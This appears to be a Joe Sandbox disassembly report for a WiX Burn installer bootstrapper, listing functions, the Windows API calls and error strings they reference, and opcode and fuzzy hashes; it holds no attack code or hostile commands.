API String ID: 32694325-1564579409
Opcode ID: d854a4514a18b0d2881ff848fe41b5db2bdf8ff7c850279e887f7545f95d61f5
Instruction ID: e9fd7b20f31330484c35f4b025a57192ee58f00968bf7b93cfddcff211f0bb8f
Opcode Fuzzy Hash: d854a4514a18b0d2881ff848fe41b5db2bdf8ff7c850279e887f7545f95d61f5
Instruction Fuzzy Hash: 7EA1A572A4461ABBDB129AA4CC85EEEB76EBF04714F01026AF515F7141DB70EE04CBE4

Function 0065762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(0066756B,006553BD,00000000,00655445), ref: 0065764C

Strings

WixBundleUILevel, xrefs: 00657EBE
0, xrefs: 00657663
LogonUser, xrefs: 00657882
Failed to add built-in variable: %ls., xrefs: 00657F19
#, xrefs: 006576CB
WixBundleTag, xrefs: 00657EAE
WixBundleExecutePackageCacheFolder, xrefs: 00657D98
WixBundleActiveParent, xrefs: 00657E62
WixBundleSourceProcessPath, xrefs: 00657E8E
InstallerName, xrefs: 00657812
WixBundleForcedRestartPackage, xrefs: 00657E14
WixBundleProviderKey, xrefs: 00657E7E
WixBundleVersion, xrefs: 00657ECE
WixBundleInstalled, xrefs: 00657E2A
Date, xrefs: 00657770
WixBundleAction, xrefs: 00657D76
InstallerVersion, xrefs: 00657833
WixBundleSourceProcessFolder, xrefs: 00657E9E
WixBundleElevated, xrefs: 00657E46
', xrefs: 006578EB
$, xrefs: 00657D49
WixBundleExecutePackageAction, xrefs: 00657DF8

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: cc570b7f25dfd0762c43121a96ff2fc98e9eec221e777a020eff9f1b8404a70e
Instruction ID: 84b32c410cb62a15362c3962a460270826f4bd38b2bae8d0de81334092fe22d6
Opcode Fuzzy Hash: cc570b7f25dfd0762c43121a96ff2fc98e9eec221e777a020eff9f1b8404a70e
Instruction Fuzzy Hash: 53325AB0D116299BDF65CF5AC98879DFAB9BB48314F9081EED60CA7610C7B00B88CF55

Function 006682BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00655489), ref: 00668310

Part of subcall function 00690879: OpenProcessToken.ADVAPI32(?,00000008,?,006553BD,00000000,?,?,?,?,?,?,?,0066769D,00000000), ref: 00690897
Part of subcall function 00690879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0066769D,00000000), ref: 006908A1
Part of subcall function 00690879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0066769D,00000000), ref: 0069092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00668336
GetLastError.KERNEL32 ref: 00668340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 006683BD
GetLastError.KERNEL32 ref: 006683C7
UuidCreate.RPCRT4(?), ref: 00668406

Strings

Failed to get windows path for working folder., xrefs: 0066836E
Failed to convert working folder guid into string., xrefs: 00668446
Failed to get temp path for working folder., xrefs: 006683F5
Failed to concat Temp directory on windows path for working folder., xrefs: 006683AD
Temp\, xrefs: 00668395
Failed to create working folder guid., xrefs: 00668413
cache.cpp, xrefs: 00668364, 006683EB, 0066843C
Failed to append bundle id on to temp path for working folder., xrefs: 00668470
Failed to ensure windows path for working folder ended in backslash., xrefs: 0066838B
4Mw, xrefs: 006683BD
%ls%ls\, xrefs: 00668458
Failed to copy working folder path., xrefs: 0066848B

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4Mw$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-1835725942
Opcode ID: fca948ffe3a886a20d1cd9f72fb1a0bfa67f301cce95d582a71ea59945ec0d11
Instruction ID: 32ca20393566eb6858692d363b8c24031174ffdcd06a06298ca3ebbdc3c4b107
Opcode Fuzzy Hash: fca948ffe3a886a20d1cd9f72fb1a0bfa67f301cce95d582a71ea59945ec0d11
Instruction Fuzzy Hash: 8141D972A40335BBDB30AAF4DD09F9A73AEAB05B11F154265BE04F7240EE749D048AE5

Function 006710FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0067111D
CoUninitialize.COMBASE ref: 00671398

Strings

Failed to reset begin operation event., xrefs: 00671350
Failed to initialize cabinet.dll., xrefs: 0067119F
Failed to initialize COM., xrefs: 00671129
<the>.cab, xrefs: 006711BD
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 00671279
Failed to set operation complete event., xrefs: 006712C4
Invalid operation for this state., xrefs: 0067137C
cabextract.cpp, xrefs: 00671193, 006712BA, 00671307, 00671346, 00671372
Failed to wait for begin operation event., xrefs: 00671311

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: 88dcac8d511a9026a3810215664210c4047c177a85d44157a7f7ae505117d54b
Instruction ID: d8eb1fa94a6674ffd4ff9fc6e9bccdb00b70f99996af11624ec67e579104d819
Opcode Fuzzy Hash: 88dcac8d511a9026a3810215664210c4047c177a85d44157a7f7ae505117d54b
Instruction Fuzzy Hash: DA515932940161E79F2067DC8C019BB36579B07B70B23832BBD29FF792D6158E41C6E6

Function 006542D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00655266,?,?,00000000,?,?), ref: 00654303
InitializeCriticalSection.KERNEL32(000000D0,?,?,00655266,?,?,00000000,?,?), ref: 0065430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00655266,?,?,00000000,?,?), ref: 00654352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00655266,?,?,00000000,?,?), ref: 0065435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00655266,?,?,00000000,?,?), ref: 00654370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00655266,?,?,00000000,?,?), ref: 00654380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00655266,?,?,00000000,?,?), ref: 006543D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00655266,?,?,00000000,?,?), ref: 006543DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00655266,?,?,00000000,?,?), ref: 006543EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00655266,?,?,00000000,?,?), ref: 006543FE

Strings

Failed to initialize engine section., xrefs: 00654467
burn.filehandle.self, xrefs: 006543CB, 006543D3, 006543D8, 006543D9, 006543F9, 006544CB
burn.filehandle.attached, xrefs: 0065434D, 00654355, 0065435A, 0065435B, 0065437B, 0065449F
Failed to parse file handle: '%ls', xrefs: 00654482
Missing required parameter for switch: %ls, xrefs: 006544A4
engine.cpp, xrefs: 00654495, 006544C1

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3039292287-3209860532
Opcode ID: c539a3f04336cbb5888248925a0fd9dbde8e6a0143fbb5f2422b264ad3c7b2d7
Instruction ID: 371322c9000b62834e460c838eee1adab308de433b25d1ae27d04b102c277fe5
Opcode Fuzzy Hash: c539a3f04336cbb5888248925a0fd9dbde8e6a0143fbb5f2422b264ad3c7b2d7
Instruction Fuzzy Hash: 8551E671A40215BFCF24DF64DD86FAA77AEFF04B61F00015AFA14D7290DB70A950CAA4

Function 0066E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsSetValue.KERNEL32(?,?), ref: 0066E7FF
RegisterClassW.USER32(?), ref: 0066E82B
GetLastError.KERNEL32 ref: 0066E836
CreateWindowExW.USER32(00000080,006A9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0066E89D
GetLastError.KERNEL32 ref: 0066E8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0066E945

Strings

WixBurnMessageWindow, xrefs: 0066E824, 0066E940
Failed to register window., xrefs: 0066E864
uithread.cpp, xrefs: 0066E85A, 0066E8CB
Unexpected return value from message pump., xrefs: 0066E930
Failed to create window., xrefs: 0066E8D5

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: a59fa850aaf23c9fafafe972a581d673eb3c760ebd7f5e757842c555b0bcc8ce
Instruction ID: 194ef614be448072e2c1970b5ff0ff846266971aca6102e7f1e52675ab3d9051
Opcode Fuzzy Hash: a59fa850aaf23c9fafafe972a581d673eb3c760ebd7f5e757842c555b0bcc8ce
Instruction Fuzzy Hash: 3E41B776900225EBDB209FA5DD44ADEBFBEFF05760F21412AF914AB240D731AD41CBA0

Function 0065C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0065C47F,00655405,?,?,00655445), ref: 0065C2D6
GetLastError.KERNEL32(?,0065C47F,00655405,?,?,00655445,00655445,00000000,?,00000000), ref: 0065C2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0065C47F,00655405,?,?,00655445,00655445,00000000,?), ref: 0065C336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,0065C47F,00655405,?,?,00655445,00655445,00000000,?,00000000), ref: 0065C33C
DuplicateHandle.KERNELBASE(00000000,?,0065C47F,00655405,?,?,00655445,00655445,00000000,?,00000000), ref: 0065C33F
GetLastError.KERNEL32(?,0065C47F,00655405,?,?,00655445,00655445,00000000,?,00000000), ref: 0065C349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0065C47F,00655405,?,?,00655445,00655445,00000000,?,00000000), ref: 0065C39B
GetLastError.KERNEL32(?,0065C47F,00655405,?,?,00655445,00655445,00000000,?,00000000), ref: 0065C3A5

Strings

Failed to open container., xrefs: 0065C3F1
feclient.dll, xrefs: 0065C398
container.cpp, xrefs: 0065C30B, 0065C36D, 0065C3C9
Failed to open file: %ls, xrefs: 0065C318
Failed to duplicate handle to container: %ls, xrefs: 0065C37A
Failed to move file pointer to container offset., xrefs: 0065C3D3
crypt32.dll, xrefs: 0065C397

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: 1d71873221e0431d2c10e6935ed850bd2f1ef5fa6ee77c8326cf08a22e6a02b0
Instruction ID: 1f9364795439267ae276939e5bb82a53c0c09535a92c3bc75309a4f74fc2586e
Opcode Fuzzy Hash: 1d71873221e0431d2c10e6935ed850bd2f1ef5fa6ee77c8326cf08a22e6a02b0
Instruction Fuzzy Hash: 0E41C436140305AFDB209F199D49E5B3AABEB84B71F228029FD14EB341EB71D805DA60

Function 00692AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00653838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00653877
Part of subcall function 00653838: GetLastError.KERNEL32 ref: 00653881

Part of subcall function 00694A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00694A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00692B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00692B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00692B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00692BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00692BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00692BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00692C01

Strings

MsiEnumProductsExW, xrefs: 00692B76
Msi.dll, xrefs: 00692B09
MsiDeterminePatchSequenceW, xrefs: 00692B36
MsiSourceListAddSourceExW, xrefs: 00692BF6
MsiGetPatchInfoExW, xrefs: 00692B96
MsiDetermineApplicablePatchesW, xrefs: 00692B56
MsiGetProductInfoExW, xrefs: 00692BB6
MsiSetExternalUIRecord, xrefs: 00692BD6

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: ea202e6bb6df6bdbd722447355d7aaf52591d3bdcfd8f442568c3f3fb384c293
Instruction ID: cccbfece05523da9f312f26eaca54aedb73e7b396bdbd2ffb243463e4ac55486
Opcode Fuzzy Hash: ea202e6bb6df6bdbd722447355d7aaf52591d3bdcfd8f442568c3f3fb384c293
Instruction Fuzzy Hash: FD31D1F0940219EEDB129F21ED12BA97BA7F715748F01322AE804566B1F7F60CC5AF54

Function 0069304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153
libraryloadercomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00693609,00000000,?,00000000), ref: 00693069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0067C025,?,00655405,?,00000000,?), ref: 00693075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006930B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006930C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 006930CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006930D6
CoCreateInstance.OLE32(006BB6B8,00000000,00000001,0069B818,?,?,?,?,?,?,?,?,?,?,?,0067C025), ref: 00693111
ExitProcess.KERNEL32 ref: 006931C0

Strings

Wow64RevertWow64FsRedirection, xrefs: 006930CE
kernel32.dll, xrefs: 00693059
IsWow64Process, xrefs: 006930AF
Wow64DisableWow64FsRedirection, xrefs: 006930BB
Wow64EnableWow64FsRedirection, xrefs: 006930C3
xmlutil.cpp, xrefs: 00693099

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 1239a8ad4bd0a9f036382155e5b564f71c3200442f745bf893e38b8989b6271f
Instruction ID: ea4bb0cc83cadd9f50c89e58f29e9c8692e26f13bb915471dd6d80cd2d880b83
Opcode Fuzzy Hash: 1239a8ad4bd0a9f036382155e5b564f71c3200442f745bf893e38b8989b6271f
Instruction Fuzzy Hash: 7741C271A01225ABCF249FA8C845BEEBBBEEF44710F110069F901EBB50DB71DE418B94

Function 0068FCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0068FCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 0068FCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0068FD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0068FD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0068FD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0068FD8B

Strings

Crypt32.dll, xrefs: 0068FD0C
AdvApi32.dll, xrefs: 0068FCB5
CryptUnprotectMemory, xrefs: 0068FD6C
cryputil.cpp, xrefs: 0068FD60
CryptProtectMemory, xrefs: 0068FD20
SystemFunction041, xrefs: 0068FCD8
SystemFunction040, xrefs: 0068FCCB

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: bb115381208d5377aa557ab364b149e131001f3440d7e1a02ee5162095b287bc
Instruction ID: e75f588256ce2793c87c1bf42ba2b8aeff2ad0faca4824502dd8856e3a85fd36
Opcode Fuzzy Hash: bb115381208d5377aa557ab364b149e131001f3440d7e1a02ee5162095b287bc
Instruction Fuzzy Hash: 942183B39912319BC7316F55AD05B9A69D3AF00B51F163335FE00AB260E7E49C809BE5

Function 00671741 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,0069B4A0,?,00000000,00000000,00000000,?,?,0065C3EB,?,00000000,?,0065C47F), ref: 00671778
GetLastError.KERNEL32(?,0065C3EB,?,00000000,?,0065C47F,00655405,?,?,00655445,00655445,00000000,?,00000000), ref: 00671781

Strings

Failed to copy file name., xrefs: 00671763
Failed to create begin operation event., xrefs: 006717AF
Failed to create extraction thread., xrefs: 00671841
Failed to create operation complete event., xrefs: 006717F5
cabextract.cpp, xrefs: 006717A5, 006717EB, 00671837
Failed to wait for operation complete., xrefs: 00671854

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp
API String ID: 545576003-1680384675
Opcode ID: d1c9f195cb9720c4476d120dddfe11ebcd1305f75947d605f24050b89a9960e4
Instruction ID: 8cedd5618fdec9cf03b25fa428799325c1990927410627df3a34fee309126ee5
Opcode Fuzzy Hash: d1c9f195cb9720c4476d120dddfe11ebcd1305f75947d605f24050b89a9960e4
Instruction Fuzzy Hash: 72212C77D4063676D33116AD4D46F6B669FEB02BA0B038227FD08BF680E750DC0085E6

Function 006708C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 006708F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0067090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0067090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00670912
GetLastError.KERNEL32(?,?), ref: 0067091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0067098B
GetLastError.KERNEL32(?,?), ref: 00670998

Strings

Failed to open cabinet file: %hs, xrefs: 006709C9
Failed to add virtual file pointer for cab container., xrefs: 00670971
<the>.cab, xrefs: 006708EB
Failed to duplicate handle to cab container., xrefs: 0067094A
cabextract.cpp, xrefs: 00670940, 006709BC

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 460bfef88719f38ceeed0cee175d1ce1bd2bf8e425f56b34dc8cf943f937d957
Instruction ID: 820c20c0e1fd95eed4479ea3db9dbeb6e0a8b6b4ce9204e5b5f7c906a83040e4
Opcode Fuzzy Hash: 460bfef88719f38ceeed0cee175d1ce1bd2bf8e425f56b34dc8cf943f937d957
Instruction Fuzzy Hash: 22310632941135FBFB205B959D09EAFBA6EEF05B60F115116FE08B7640D7209D00CAF1

Function 00663F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00663AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00663FB5,feclient.dll,?,00000000,?,?,?,00654B12), ref: 00663B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00654B12,?,?,0069B488,?,00000001,00000000,00000000), ref: 0066404C

Strings

feclient.dll, xrefs: 00663FAF, 0066405C
Failed to get current directory., xrefs: 0066402E
Failed to open log: %ls, xrefs: 006640C8
log, xrefs: 00663FF3
Failed to copy log path to prefix., xrefs: 0066416E
Failed to copy log extension to extension., xrefs: 00664191
Setup, xrefs: 00663FF9
Failed to copy full log path to prefix., xrefs: 006641AF
msasn1.dll, xrefs: 00664162, 006641A3
clbcatq.dll, xrefs: 00664185
Failed to get non-session specific TEMP folder., xrefs: 006640F6
crypt32.dll, xrefs: 00663FF2, 00664057, 0066405F, 006640C6, 00664100, 00664141, 00664160, 0066419E, 006641C8

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

